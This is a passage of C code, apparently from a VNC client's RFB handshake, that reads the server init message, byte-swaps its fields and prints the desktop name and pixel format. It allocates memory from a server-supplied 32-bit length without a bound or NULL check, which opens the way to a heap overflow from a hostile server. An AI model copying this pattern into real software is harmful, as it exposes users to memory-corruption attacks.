*)&ci, sz_rfbClientInitMsg)) return False; if(!ReadExact(sock, (char *)&si, sz_rfbServerInitMsg)) return False; si.framebufferWidth = Swap16IfLE(si.framebufferWidth); si.framebufferHeight = Swap16IfLE(si.framebufferHeight); si.format.redMax = Swap16IfLE(si.format.redMax); si.format.greenMax = Swap16IfLE(si.format.greenMax); si.format.blueMax = Swap16IfLE(si.format.blueMax); si.nameLength = Swap32IfLE(si.nameLength); desktopName = malloc(si.nameLength + 1); if(!ReadExact(sock, desktopName, si.nameLength)) { free(desktopName); return False; } desktopName[si.nameLength] = 0; fprintf(stderr,"%s: Desktop name \"%s\"\n",programName,desktopName); free(desktopName); fprintf(stderr, "%s: Connected to VNC server, using protocol version %d.%d\n", programName, rfbProtocolMajorVersion, rfbProtocolMinorVersion); fprintf(stderr,"%s: VNC server default format:\n",programName); PrintPixelFormat(&si.format); return True; }